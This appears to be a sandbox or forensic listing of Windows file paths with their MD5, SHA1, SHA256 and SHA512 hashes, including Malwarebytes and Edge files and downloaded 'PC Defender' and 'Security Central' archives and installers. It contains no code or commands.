C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.XML

MD5 7050d5ae8acfbe560fa11073fef8185d
SHA1 5bc38e77ff06785fe0aec5a345c4ccd15752560e
SHA256 cb87767c4a384c24e4a0f88455f59101b1ae7b4fb8de8a5adb4136c5f7ee545b
SHA512 a7a295ac8921bb3dde58d4bcde9372ed59def61d4b7699057274960fa8c1d1a1daff834a93f7a0698e9e5c16db43af05e9fd2d6d7c9232f7d26ffcff5fc5900b

C:\ProgramData\Malwarebytes\MBAMService\config\ScanConfig.json

MD5 ecf1b81ab2b3dc5f5c373b62b23cf347
SHA1 cbcf03dd5c4a0871ed562b7a7acddec685b67bdc
SHA256 09d34df16fb10d57f326d879cb7409eb7a58c65fb103c446cef8c65fe25ecde4
SHA512 a36ef74ff4d6a6f18e601934f827c525a513e78de21b7f3d1aee880181cd672d1fc295259cc1f622ca56e44688b20b7fbe6d6aa4b8b6786b72608f7558b8ff9f

C:\ProgramData\Malwarebytes\MBAMService\ScanResults\7219a01a-ea34-11ee-a180-62d9003ae027.json

MD5 90d0e1acd2ed272c4b401ccc937a8f15
SHA1 3314ddca12b3da080d1f3e9bc8c85bdef3306b33
SHA256 508437e47da2fc79954f87f36e9570e02ef00817c62f469206873835ec9b1f88
SHA512 f8b15a05c83d374f9af71e5c55faffa6b5eb2694018827534c6b579f21baa2b2f052cda4a839c1f5a04fa16674a0671915ad0f8dad5a596909bc49e40399e986

C:\ProgramData\Malwarebytes\MBAMService\config\UpdateControllerConfig.json

MD5 84f27bc30202635cf016f39b77f36ac2
SHA1 c6084fa257cd4c88e48569463b0961c7132d95df
SHA256 f1bb4533afe3b0aa365fff10cefc39e95f1296ba159e573f031c5649b7eed46c
SHA512 7428b99a77fe7f63d0de67b8d42ab3734cc81166e3d3cbc6c1cac7ffd4e289d5c07215ed4b5ecb7e3b0fa75d735f1e4344d8102e333348b607b2dc7aacd5372a

C:\ProgramData\Malwarebytes\MBAMService\dbclsupdate\dbcls.64bit.full.7z

MD5 6bd2d5010e481277b8c00a4abd69490a
SHA1 ee4481ed3d84cb13cfac1387bc6fa637447f9ce2
SHA256 40814d5a5f0834272dc68e370c190a6a2bd849bd3f738724ae64b4f550056962
SHA512 beb878d697c700d1938bfd1905f561abb3478ec19bc19cdc2ef09d65222940339c93c23e8dc5cf71d0c4fd498d4bdb59dc058af65d6ad968660e698d98cc3dfb

C:\ProgramData\Malwarebytes\MBAMService\config\UpdateControllerConfig.json

MD5 1f287d98e0b875e81828100139ea8a2d
SHA1 397356ede8d0f58f1c29b6059bf82205659de3cc
SHA256 1bbaa6e6853ecca382d312121f9d3aac13cfb7d77e6aa44648d772a7c7961fe5
SHA512 b2c697da2da947648258cc4b59e382b4011656f77ab2dc3e527bad07bbf5e26df272d1ebf11cb8a7aefbec7ed17e2539e47aa5e7ada535a2de061c53b07c8d46

C:\ProgramData\Malwarebytes\MBAMService\config\CloudConfig.json

MD5 8d47edbfd5256b5593450e4d9d0afcdc
SHA1 38765b4ca4857cb48311824b227c4f1a455fa4b7
SHA256 d872fa93dd5e2cabc4c736a49b0a2403d2a7c0e9f4af64cb9baae28a5cf375f6
SHA512 4fc2a1ac3468c208f3dc9f0791f97ee7da3edf9f6af2c8c4ee96e5a53d7c916c197d5506d8640c377b9b849ac8e772faf2975c60547b264b798ccfa4f6dcdea1

C:\ProgramData\Malwarebytes\MBAMService\config\ScanConfig.json

MD5 a9f74938eb35ee881d08a00283e2181f
SHA1 02ea9f4b700c0d9bb6b0eee9c2deec33e52face0
SHA256 45670477cb9a8dda3a32187aef5f52c4decdc35c7fecff903176f4e4e1e349c7
SHA512 cb1756b66ab0b8279f6e6ab07137bab5ece444d853524c3aae32bab02325b916c347a33b9239b7a00cf9846a8b4d60a4807c3339a58daf84d3fcac91c226a0bf

C:\ProgramData\Malwarebytes\MBAMService\config\ScanConfig.json

MD5 f00ebe0c372d537632ec5a5a4f69bffd
SHA1 99f2fc4db45123b2713ac30e87b050dd5b5c66b1
SHA256 ab69b9fe23cce16aa558eedefb1f751455d67a8422a80560a23f49fd1e1752da
SHA512 f550526b9e78581ce434bae1637789a51694bb1ab74cec2c0d41d38e2f46bb3d24c9d63d23f9ed15b63d9e0a54b4c6f3b1fc8fdd3199cf9fa2ce67b2d85f30dd

C:\ProgramData\Malwarebytes\MBAMService\config\CloudConfig.json

MD5 5d045cb388dcf6d614b28790c523a255
SHA1 c71c9388741d3c1dbf7785bb47ad8630586cf99e
SHA256 c80d314be29c7b22c01f7c2a7d2e806f19e731b1fecddf895e8272f2fdf6947a
SHA512 6093267683b11524f74503040380ddb2aa3eb3ae022ad7db1114c1e18de16f4041016d721cc4aabe69601c59d2317f86f78d79d21ee281e8a68be171b6bea9cf

C:\ProgramData\Malwarebytes\MBAMService\config\ScanConfig.json

MD5 2a89c401869d45b8d49a9730e0cd75b9
SHA1 b0db4d014a7dffbad1bb5993720d5044a86307eb
SHA256 7565e5a6659bc21d88b89087e896e18364eea716500ae038adad4ab932ab9fa3
SHA512 eff541bf848b9a40a2575c032642768b6f9e13329ffc4297b0fc83cb58852d3f3dd935b52bc79998b83c34a41816fa67403188d1c38853c93eddc5097348514c

C:\ProgramData\Malwarebytes\MBAMService\config\ScanConfig.json

MD5 1896b92f444e18063939079a71a0339e
SHA1 940a9a795d7bcd430b0fce47cd381d0fb617098e
SHA256 80b7a8baa6922540a0dad3731a701829a1a183a1198b609571386212e05e79f9
SHA512 b63fe565c015a5f0a2fcd480ef506559429058e3d1f55ba40419e0b49c826a9328cd4f72f656950dd91bc2196c1e7bef0dc35183f312e3c80bf72197241e2ff0

C:\ProgramData\Malwarebytes\MBAMService\config\ScanConfig.json

MD5 2d24875c346c85b0c42c469412f193b4
SHA1 445b0bf14de9c86f378b3ebfc9539d22d61889e6
SHA256 d44829f3a6b397dc2b8319306a97daca854f55db4f80ac4199276a6ab8ccf63b
SHA512 7a40c128bc07808592f4704129c7ef195dbe0ab6f8bf0681c59d38b1c73713123e7af4205378a117a57b5136830c30fabe1d358c1723af160c8a933b614011c9

C:\ProgramData\Malwarebytes\MBAMService\config\ScanConfig.json

MD5 082ab8e47653b1d2e30f59e3d4dd0ccf
SHA1 bb441cde07f6d766c3b62bb884d367cd6bd4ea48
SHA256 14bfc9491e45e101587e44d6d3c493f1c8f78c453f812eed7732b26dcfbddb5b
SHA512 217747eb4bf356c6d398b66936b06bff24a6f711c57e42fcbb0ff63c446a7ee64899709b9ad1544a70f82bb05fd2fb8a5ea594e536c87ffb85bd9d38c4ae31eb

C:\ProgramData\Malwarebytes\MBAMService\config\ScanConfig.json

MD5 0175fc4fd02c229c27db5d9b70a845cd
SHA1 e77943ef45d032e3e171d640e965be600a1472d6
SHA256 c11935f9f34f07f9eb818f158ac91d6af7d6d22de2d7dd19709189e0e04b2561
SHA512 0312b00636138e168ba14af52f1216b46be0c8a0e405101862102e8071eaf2624b7b69b7425c2cd466cc18bfbfdb9bac88e78d41ea90c7a4f0038ef26759ff10

C:\ProgramData\Malwarebytes\MBAMService\config\ScanConfig.json

MD5 f07972221729764a81d1280c203ed19f
SHA1 9e21c223550fe72aae92c16a59a9128af63990ff
SHA256 6cffb4166bb60129d38de4ede9ae63a70062cdf74c93ab666993bb7847d6842b
SHA512 b7c7ba90001364d1473b776dadb2505ef82970d9d7b7babf25fc9e1943f2ff08820ecac3b33568639f0c97a4a3cc0e68153edd4b437782328b2397e0ae533ef6

C:\ProgramData\Malwarebytes\MBAMService\config\ScanConfig.json

MD5 0d4426398fd9192f80dee69d7fe404f8
SHA1 676ff2a6f009c47b36a580bea7c9161b17965120
SHA256 fc9cf7686484e407901a35c34bdee05e1b3aed0dc31d2ce6253bfc608c0c08d5
SHA512 a685fe6ac33b88091135d87f39c8e0fba4d274fc0e0eb02ef1f8b8a56c35f1bb3f168a63d061c7aaaa4e7547f3f07e53c292bb4d73ea8026a686a04945793849

C:\ProgramData\Malwarebytes\MBAMService\config\CloudConfig.json

MD5 fce560b99c66b6e5228b82c133477d60
SHA1 439d9924ffb1aa7a84c98ca677215ac36657284d
SHA256 248c5d81eeac486b554db16666e2ef30963c7e2af209deb638d34850f2f81838
SHA512 681165e9df2ff55774a8c43408b8677171e3822b89b27caf5b62b898fb88f7bf44c3161d9f16e46db6ba81e61befcea5efd057b3bc0f36ff1905ef7e3cff89ed

C:\ProgramData\Malwarebytes\MBAMService\config\ScanConfig.json

MD5 dab6d1bacd066b16dde1f495a8540f09
SHA1 fe53453b99acbb07a911bb9aff40e60c834d87c5
SHA256 57bd212894ca412b227abeb2c16544003cfeab997d3bff468c1e4c3358c236a2
SHA512 5e141e35dcea63a6e226831348355c0455f540169f9dc196a3101816ca573ce391b9bc1cfdb5e0a3f894687c6350c7010f16087cfac83c29fb84cc8537adac81

C:\ProgramData\Malwarebytes\MBAMService\tmp\d926bd78ea3511eea15762d9003ae027

MD5 c2781e281043750bbbef41949ec39742
SHA1 2cec74962f41e06a9059710d6a70aa80b792b2fb
SHA256 5ca9ed4f0ff3fe2fea7721e2a016ee8ee8dc182e4fa20a6f7db51c1d6ba88788
SHA512 9a40873299a9f4a158c1166b2dad9283c68bdcdd429d0b9a2e9caf32b9bb76c616828b30efb52984e21b8dd5729851c17d7b9ec6c31e1de9108e8c9f90d67a50

C:\ProgramData\Malwarebytes\MBAMService\tmp\d8cc8fecea3511ee99d262d9003ae027

MD5 231e190eafe2d0a704331a4ae10df9b3
SHA1 108c55738e19ad87c99fde5c2a720d2acc9864cf
SHA256 f8041602c8038d132ee294396ceac024b39aaa94c50011d347d250d2ecade15a
SHA512 ed1d9102eaf4735467d72e6db3449a9bb098577194e969ac888c05e144411aadfa652034b1ceab3bff1bbf10c71e50b5a415b7042da1456a4a62d7dde199ff05

C:\ProgramData\Malwarebytes\MBAMService\config\CloudConfig.json

MD5 c473440f6708d9c74385691b1462b6c2
SHA1 bb5487b8b46e15a2b587e92002249a700cf2a1ee
SHA256 76aafb4bc06bacc4ff304143490957852a8634ea648d14b21ff897751ef3a4e7
SHA512 5d0b2adbf711ad87ca9dc0d163d60102a4343d1012131ae169411f75d5d3a90ce39d1a39475cf453a5caa77f80a2476b0d97aea3b2d9a9c54dd65ab24909f29e

C:\ProgramData\Malwarebytes\MBAMService\config\CloudConfig.json

MD5 9edb8db118e8109f2dc37522c245620a
SHA1 7828b3d0a0e43f822a3d102beb58ac9942acbf5f
SHA256 128090d0635b0a40acbb11c223e343724c91939dedac9aaba1af526b510996df
SHA512 f66aa4d2dceef6ea0919f1e1d9b091d4df369051a3d4e46528fff680beec4afa1facb5e7ed462aa0197f38b2efb3f3f4381909f0962290f0cd1ed23c2b41844e

C:\ProgramData\Malwarebytes\MBAMService\config\CloudConfig.json

MD5 3b8ae0b142822f751776196d1455be03
SHA1 91629e39c9d8fa6bc1701281f3ff8b8a5197f04a
SHA256 9eb8a436552d46c2cf482336e18c257ddb5f6cd738b4a71bd0aa962597175eeb
SHA512 30f4228078f120f34ebbda44a283560d4d92bf32e7fd8a05e271db637ce6e4b68b7c7e99bc988c662049d10884b2f7d377c6f0791a1f2ed30aad8b9cc0917291

C:\ProgramData\Malwarebytes\MBAMService\config\CloudConfig.json

MD5 67bb9bff5ae6fe8e815af382f8b59c45
SHA1 e1e0bd20c2d058949cc9f71be63931888ba448ee
SHA256 2d5a4a61f99d2d29209b13a70d475663527064eb88b3c5ae5eb10cdc1568c65a
SHA512 3e016f83f8edd396328e2f32e467c1b0fad886c884bb8430c9e4ffe06e26dd84a3ffd7ece29d21866a880ece7f69fbf3fdd000b98c9775974b8d690a1643ff45

C:\ProgramData\Malwarebytes\MBAMService\config\CloudConfig.json

MD5 31e2cc9f519526f90e8072835f8dcc45
SHA1 b70d036f7fc001cdbd4bbe837156e549a8527e55
SHA256 43a53c006f43a8e75935768e3fa9bc5d2b5f569ba34d43fef8886148a831f2f2
SHA512 aa37aef2df046d6b1bf8cbf3751e952a476ed891c215ec48382395c5a2f27fe1d384180c401056a6e2895bdb534386a2f63b9874120c4fc5c77917a4f25e5f14

C:\ProgramData\Malwarebytes\MBAMService\config\CloudConfig.json

MD5 f1796ce040afe804879f4fa19e9f9dbe
SHA1 cb19025bca14e4c414fcdfcd3cfd1514f8cb2fba
SHA256 4cc07e6ed508861fb97eb1a10480d9ff9b9f59d980c461aafde5eab57339c0f9
SHA512 54d8b4ab0236fb4f7fac48e3a651e1cadbb209ca58f877000327e43aad1398ecf85e9e73555a5cb82fb11d8785577f8bedf8411df915eef567a33724a1fbd3ef

C:\ProgramData\Malwarebytes\MBAMService\config\ScanConfig.json

MD5 71f12ff772193303e8e21935f1cd3347
SHA1 e96ed3c4d20cde637740b9ef2c7c7ea102c9b41c
SHA256 aa84ee4b3e81aa96601e1a0fb89c3855d2a033c5d35baddfe5f8392b72282a9c
SHA512 8c1a7f06ac0ebc94f373153e6badb706bc3d2a0b4b1aeabb46a096a612f9645d0bd59682771f4b0a4c47a220c627071aabc9e86d7cec8c3640b4264dc45b5c4c

C:\Windows\Temp\tmp1708aaaaaa

MD5 08d7d945b1d6f4408c9144a0426f824c
SHA1 cf68fd84d6f929c09e3bcc6b2245b485c92f2803
SHA256 7b714c25c59bc88eceb779118065d6f3f946535ca350d0907f2f46c99ac2319b
SHA512 6cfa9df8b2b97b8242b189e2ad421c08d94f830e054248f69bc2159b850b9e6c0e261671952424f7a64566daa93806fa1b09b85112d9a7e798f66aacc3aace5d

C:\ProgramData\Malwarebytes\MBAMService\config\CloudConfig.json

MD5 b37bc252c4b03636d6acc484c12bea38
SHA1 73e439d270cd14436ef75eac6a6a33a589856812
SHA256 6c2ec99fd972e195b9fa710757509fa1362e3d71b148275be00f8da0513fed97
SHA512 e7de431cd1646203667c3f0a8faa1ca24b1155b16a832592f52e84a5528078dda9e458feac2ad44c4968f2523f032d1e46266a0a41edc6f89f0c3be2eb633b02

C:\ProgramData\Malwarebytes\MBAMService\config\CloudConfig.json

MD5 1ccc788c3b22723d7512f8cc1b8cf040
SHA1 9fea60c5ce32252d16676021e9b596902166264f
SHA256 d6c5fa2698fb85e92ca1d1804669b5436b40d6a34a48339bbcbb9cecdab8072d
SHA512 125e607ca3ef9d097e303aa95e696f90a463b36c7c6ec2d503f6dda2c877dcf5d7867bd8eb58fe49f21f0a29ed6f64f7f0145de08a87983cba69fdd90ce2b61d

C:\ProgramData\Malwarebytes\MBAMService\tmp\dc9e09f2ea3511ee8ac562d9003ae027

MD5 246df647be939e4aab19b5892ed87b47
SHA1 88ceb7f8dbf280abd10b9333b99b5e2489da67f8
SHA256 5d75952b0457d9691f093aa6524aa1cfa96584be3ec95afdfecf5a0471fb91d3
SHA512 2c3be2aec83abacbe5f2b93d2278bcdac961d72764076c7164edccf13859338e2dc40ace4ae3511208bbdcedfa60539ae4c6b2b00fc92a5e9eeee8ab17b05ad8

C:\ProgramData\Malwarebytes\MBAMService\tmp\dc591d24ea3511eeaf7862d9003ae027

MD5 57f92586bec1156d85308893d28c8d3a
SHA1 9cbd97c234c71833e462fc2f870419c2533bb2ee
SHA256 304b6c51ff4daf1ba42cf7b46b033f8aade7c45d68d0ffc87a60514f92b3a9f0
SHA512 bf6d91957cf8ecc8268f5f62a859c400e412ca1484bd5e72cf409c4840cefec6cec2fbe04c557e1dd18546f15c8151c73f390239c0d624ebf0f9d1393e156767

C:\ProgramData\Malwarebytes\MBAMService\config\CloudConfig.json

MD5 2d7ca36c7e9e9777ee6f667b65a8e179
SHA1 324f6f5648f752bf5119f2de18767e192ae79f27
SHA256 fcd7cc5d69bbd24346a9b46722ae39bdff13c0032f87c42b6c9d2a3053bbc18f
SHA512 412b8abc2f5b06cf892823fb74150fa136120d213715d51fba5c968bbbfbd58224769b4a21e528739a9df3acf78a19deec85eba1afea81793205025dbc9254da

C:\ProgramData\Malwarebytes\MBAMService\config\CloudConfig.json

MD5 4c323456c449fffba7c7674363e1addf
SHA1 837ab93b72644834fe0307b47c0c6a96f6bb345b
SHA256 2b72ee5de9387307347f2857fffca73b73c0068b50819a313dc188549cdfa876
SHA512 ba9bcfd790078488545e5a216731a01ceb75bac6de16b5465aba8234776836d3887a9ec3f01c90b6a7b75634d4bda0c67d37af652fc6d5a8087d8e76c4a3f55e

C:\ProgramData\Malwarebytes\MBAMService\config\CloudConfig.json

MD5 a95233c43dedd6528ee65ebb98bfda27
SHA1 ee9764b0961ae95c4d4ca6490e5b112bdcae8e23
SHA256 7038842a9f6bc303dbbf727f4cc3d7e13e3c47859f2880cce2f4f0683bdc192d
SHA512 ef9768282d084ae7542a843debe0518e106a841e3881722d20c3bc1ad46966b0158b392113884fff56cc5c47293e79a370dc8536d4fc60d7cc1657a1c519a55d

C:\ProgramData\Malwarebytes\MBAMService\config\CloudConfig.json

MD5 df2b1c69d0d607ddd0c3ba5614325717
SHA1 6bfcdc9cb5b7d63ab66b2f3c0dc37dd7e0b4105e
SHA256 912c6d1d5e480612455ffd328049868355770d969055ff59380d1955a7fd0b9a
SHA512 8be69547452440bd0ba98cdc66519f097ab4699a405894cae37bb7a87002cdee23c2a15880679796a64107fad481a506cb06c1c7165ae251fc24e8e8aa1de24b

C:\ProgramData\Malwarebytes\MBAMService\config\CloudConfig.json

MD5 0b256873477a71eb167c0ce917b5b4a2
SHA1 6b3ebe000396999994fea838529cd329d5706ff0
SHA256 21ea03b9da6549d120bc84f6abfb362f054fced08d24fcf09a6423075f16431f
SHA512 fa7e73c0a6de7d91625391df13c8c6e8368953939bfcdbf045d763324a3040a8f034a28bd240037903ee9eea6bb4cf6c7d9a599086099c282a1064e0c66d9193

C:\ProgramData\Malwarebytes\MBAMService\config\ScanConfig.json

MD5 aec4eba3e54a73c302720b0cfdee024c
SHA1 8a6cf7beeaf30012a0b246ab0805c9a8613c896f
SHA256 23a7530d801f4528f49156f16e778a95dc5d908140d478f7b607c3786028dcd0
SHA512 05130bf0ef6e606b9988a508cddcb88832d10d4193db6f143e5add5abe44db7889d55e55c6ff195069d517faa0bcef085177ff565825c792a5b207a99b4ab671

C:\ProgramData\Malwarebytes\MBAMService\config\TelemCtrlConfig.json

MD5 a5cd035dbc54c94d52383375a7ebf93e
SHA1 9eb763dfcd81bc1f8f60e6c050e9eaff2a17e9bd
SHA256 3e18c6785d7ad6999742718b8a69b0bef3c6281514f2e481dd28bfc17bad19e0
SHA512 255e09b16328c73f44c6314a8c1f6ad4e6e8fc70d341c5a685731f9ea1307002b3a2eb7f289166b417baf12e6301ba3768bd26dbd257a80a04c05768dc59ac07

C:\ProgramData\Malwarebytes\MBAMService\ScanResults\b8d8525c-ea35-11ee-b51c-62d9003ae027.json

MD5 da98e4cc5769e77671cc7639849c5336
SHA1 a1b0e99c026b913467194b914f9ea73198aab902
SHA256 a04c8b10e7b895955f1886adb03e01bd9aaa5f9eab05a776c3d2d3399f051db7
SHA512 d151fb04c27c9a39a07be92be4a396a660e9881ca5fd5a8b5be4e1dcbbf4ec1ac39c049795aba9ff360229c4f81baba58139253cf508a3442333c68386d24b42

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 c6fe3b255d7947081087def69cff4294
SHA1 3ffd47ede73c9527e1410ed74a8657783477ab43
SHA256 bb0d83af5210907f9ca0f43241c8d73ac9d5319b692e301cdc37a39b78630a3c
SHA512 1c073523a20bf983957b3a5d7b9442394e165004c3e83e75e8cd5697eb636d65a722e768e49a2449b40f9c2b5932f3ae4ff4c73f20fba1f65fd2df355465df7f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 5403b93f10c2e9bcfc48129f17498399
SHA1 ef3800bff4c81450ab07130652ff383ac8c62676
SHA256 5e51ec270f90fa31fd305112fa594adb13765f96bef3bece4e068572415ed8de
SHA512 9c586a3f4302b6bce0f91f063cc81fbe24fe10f1b6a43b9ac75c8ed7ca51f791790d3dd05ee996d5bd41a7703150b16c7736bd8b7c6fa6ab3a298cdfafda334e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 60e3f691077715586b918375dd23c6b0
SHA1 476d3eab15649c40c6aebfb6ac2366db50283d1b
SHA256 e91d13722e31f9b06c5df3582cad1ea5b73547ce3dc08b12ed461f095aad48ee
SHA512 d1c146d27bbf19362d6571e2865bb472ce4fe43dc535305615d92d6a2366f98533747a8a70a578d1f00199f716a61ce39fac5cab9dd67e9c044bc49e7343130e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 bd5340aebe0e9e39f6460bf784f6e139
SHA1 56ba086f42e38b6240bbc64ceb6e6ddea79ed513
SHA256 d0a4f8786e101a2dd3882f1096730fc1280badaadc86c558568906c29401f6a9
SHA512 2041753066a8f5e056dd15a1d90f71ad065a7eb5678a7451d6f069dddcaeb7624e4de2ddb4f73a2e9ff4de7b649b2ed38344dea7e9c664666bf9344849f5ba55

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 e45227f1fbfd20cbd12b0c43be090b6a
SHA1 c3b09f9a126e765b6d2109c0c1443e3bf89aeef6
SHA256 24baa6454be974c4ae993e6fb0d73c9757c27b9b5bf58fc2b272c72ff46ca05c
SHA512 0b582fbfbbcc343bd5e9fc419fd2df9388b09b4f4d6a0a4cfbf06349a702597c22416bd3c3a8f7bfe13c13295d8824719305ef90e6005ccfdea5cdb610713a48

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 f692307387a678d0e924b806c6bd8366
SHA1 8cd60effab42efe62d4c5b372d5201b68070b956
SHA256 c086180302361b72244b8f8b16b77433e7d32c26140ffb2152ebe1a9518d1d62
SHA512 2f4e44191ee406f131f5f974289c508ca5a13d8ddac90ce14dd38d6cef1d66928a814533d27206a770a0af5873e0cef0acb8f29ba922ddea98f33281ee05abaf

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 42e138ae6cd41ed58226a7fde3e439d8
SHA1 0acc84037284150ef5d298cf038b86632f54f7e8
SHA256 5586251060a5389368a0af233e74724f55dbd724545f0da16a1e8f2ee66eb774
SHA512 4f1c24b09c31b8216266a55e38c6c8847d693899976ddabaee73c695bce6979330a65a8255c95f8e03ebba5dbda332c4ded70d583a285f0520a98e37153a42db

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 838065593a3b3cf9d057d20ba9eb6531
SHA1 88b30c75096e08543278b0c542324cc1dfb1202a
SHA256 3cf2bb303578e82699674a14425856288db3aec3055e13e06c5f35def2b2f778
SHA512 864e0540572c41fd7dc684d833c204cb56e036118bd8ae6cc727a141b891c5a21d14c9d74100d8f76b6486502369a9f5e2eb615b37ecb8d7cf9dd4acebec51de

C:\Users\Admin\Downloads\PC Defender v2.zip

MD5 cad618323b07c0f4f6273ae08df1779e
SHA1 e67715f81f83ce7cda32f12a116cc950b6fd0dac
SHA256 854113f2737ee276ba34fac399e8a615e4de4c712dd7a761ab0e198fa09d87fc
SHA512 efd9403706accfe996b5df58300b5e0a0b461727bdf7c5492e9914369fef09ae06cdc2d00d30ac6d494fc68dadcf423d800741f7c22d5c1d565ef3fc675c4565

C:\Users\Admin\Downloads\PC Defender.zip

MD5 c2c0e8a4b2790140ea1aae223669c48f
SHA1 664a18b5db524fad9e43df2b9c3c0577562082a7
SHA256 b23eccb36868753a1131a9a6b88b33324b3cdd7e232fb80cb5df4e2994f5a9e6
SHA512 df22757f866564887154c54a053f919f03a27ced1446b95979b02b8960ec499167f6e9c3a1f76e8359ad044c8a5ed2c6addc4874a712f75726a24d3029a8587e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 0d2e59de4ab523a39b9821f5ce611984
SHA1 eaa93a24531dc9ebe4f8964532f78479770d0e1a
SHA256 91fa771e6908395b1234d11b9c3ee7755e5e1e4f1c04fe1b5e26ff81871bc229
SHA512 6d0ad13bc7fb0157e276b7b8aa76ab4ee28067c23cbb3d7180e85360cb3fbc000975e5f744886e1085a4d3d0a12fe74f185183ffc99ae84e9d7da500f81fee0e

C:\Users\Admin\Downloads\Security Central.zip

MD5 32e630865a498a6fe5bf4d8dd593dccd
SHA1 05217c896a53c77c7f751de72875a7315232c293
SHA256 62243c2840d5fbeef1cce73dbe4929727afe174968b91faba3848b89ab550d7f
SHA512 baa4ba5e61406848bcd2683fbd8d480c0ab22954af9b9933284dfc4fb2e9361fe0244efae3ce9d171b5510b8030bb510fe788d8ae3fe476b29fc8cea815ac244

C:\Users\Admin\Downloads\Security Defender 2015.zip

MD5 1e23b530fefbf0e4c6696ce8a0874081
SHA1 585ae1e314118bd4cbf15d2a66a6b708d2e46735
SHA256 5daf5731d28583a37a7d574d1d32ca89e2ed2dcc448cf0ebcdc6d43bc4981a92
SHA512 2312469eb3fb93f311bf28c14d2f5ad39e3ddd3ad4aa19306f8b276d4f401972fdc5e7659f388c08dacd739a8162b05d06e052f4342edf1c1dd9aecdc32560f0

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 0c9364361ca147b889506cf0b95e3a6d
SHA1 e085a378b0d7aea97c6b8f64b5fe32bae64054cb
SHA256 17dfee8feeb610b022b23738067354ee951818fa757f7aca5570064acd7db5b0
SHA512 04d1eeaa1c9079faadda64a5ba89688bab22f705822bda0c5ab657ac1a31806860790cbb4c17fa8706b10cde3aeedb2a0bd206a862799d85b770c542eb22e64d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 e4f85892216001cd5d3938a660b51f19
SHA1 aba1bf437eeea369fc4158a1d4ea5d86a054f9c8
SHA256 95179612d137221ca2ddcab8a0fa15c64131942525534e1c150b2f002df844e0
SHA512 1e8cb4271e5876b628e6d4c954e8cbc6b0c050818434c548bd4126bbc5c801582b01baa6086f3aa5c94f0ce2df07bb6bcd1e4d336b884e445923eaa5be3e6e9b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 352fc50563a1d13d6fd01d2e92467bea
SHA1 610553fe6583b4b4e486e4b134d579debc9d908c
SHA256 cdc3a4b4fb3026a41a00ebbf8e810c861f228052d943210a808b079e8a53b48c
SHA512 7f40ad56b2d79dc1f5b1b1448671be3fb4e459faa28a047dbaa2abb5c87a9cb8db479a36cde7cfda605774dc586323d24cce9c7f65a1a738cab752dd35a022d5

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 c7f8281a2abb124ed57b0e28703b338c
SHA1 1a8d2f3b4bbe7c67695b9601b206647dcf9a3d9e
SHA256 89deaf124562c77d98a818b76750940b98fe54e9afdba07b14f34f916c21520d
SHA512 e50146b14fb1e63051f46ab73a7a02b7c723edc6d487fd08b7871e6dc3b2b2b590508fd86dc0e3f4c758a46e4eab60f033c36a0bd6111580ac16c029b347d04e

C:\Users\Admin\AppData\Local\Temp\RarSFX0\PCDefenderSilentSetup.msi

MD5 7f728acab22868ca02cc1ba0a14f5d64
SHA1 9e3e82b152447b8bcd27583fbdab7aa91ca4739d
SHA256 586f9a9af50b2a3321e77d2b4583741cc4842967af9429cc371534f7179caec4
SHA512 9bc8bb97e6d4f18ec484fcd792466cb5df0bf0447cbaa19a41258ef80e599e8a2b2c83c700f32f30bef578b03614af1b554844d051435dc9f510ccbd56686800

C:\Windows\Installer\{FC2ABC8E-3715-4A32-B8B5-559380F45282}\_3F16219B047CF8432B7ADA.exe

MD5 b84df77564555c63c899fce0fcec7edb
SHA1 e63e7560b3c583616102cad58b06433b1a9903b0
SHA256 912ebab4ab2ea830b961df778dd854e555c89e05e25b7c02b3737429115405f9
SHA512 857717981c44a6a5fbb1bd34308e981c448746e0ea2d5bea94516fea20d0186e00a3547ad0b948c10fd9493e3ca00c0899927b0fa51c240697faacbbecca033a

C:\Config.Msi\e71c4eb.rbs

MD5 00cf43854caec1f15421d08bd050947a
SHA1 dfc472f313a45466aa618a25594f9ac075f47c99
SHA256 433b5f9d3f12c104050c3db7b59a50c00857169fda8576362900682b1e6e8002
SHA512 4f8a48d2f494ba8a0e0edc1fdc3c409e540ac9b851da720c3622a28b8e9922884ac8b79e7d8961edcc04df0b8435893610db5001c9d8b67548531eda1696b698

C:\Users\Admin\AppData\Local\Temp\{8182D845-543E-4FDA-937C-B361CEC2A0BB}.png

MD5 099ba37f81c044f6b2609537fdb7d872
SHA1 470ef859afbce52c017874d77c1695b7b0f9cb87
SHA256 8c98c856e4d43f705ff9a5c9a55f92e1885765654912b4c75385c3ea2fdef4a7
SHA512 837e1ad7fe4f5cbc0a87f3703ba211c18f32b20df93b23f681cbd0390d8077adba64cf6454a1bb28df1f7df4cb2cdc021d826b6ef8db890e40f21d618d5eb07a

C:\Users\Public\Desktop\Malwarebytes.lnk

MD5 f135a8b5896722f856c9363b71c1cae3
SHA1 d67101d8081b613b6f5566cceffdc0fc7a2746aa
SHA256 256abe3969355bf070284c4f2ed502d1acd1fb8fcdd9fff50a102a22ad733eda
SHA512 c7692be58e80152fe0f5e9a93f98115c7cd7f37480c84b10a242971e5ad5fb9bbc1be5f74a46f331d9ea8be2eef91944c80691799c5240e839d2d8fb80e5fe1b

C:\ProgramData\Malwarebytes\MBAMService\Quarantine\7697ae48-ea34-11ee-9af7-62d9003ae027.data

MD5 d46dd8bfb6ffcf08c6c8d68719cc0ea2
SHA1 c96cb01bf6e6c7fbe13a0a59e272c7c8f08622f4
SHA256 717154c949f7e947d85b1ae3f938b71a27a38cc2eb9fedea67a27676b8eb4a0b
SHA512 9ed59cd8a9bd4719b378df5671b10b85d5659b723c6e4bd48259900624e0298224a5af056099db55d340547ec486e6d60758479c4472fce204a1e40e413f7595

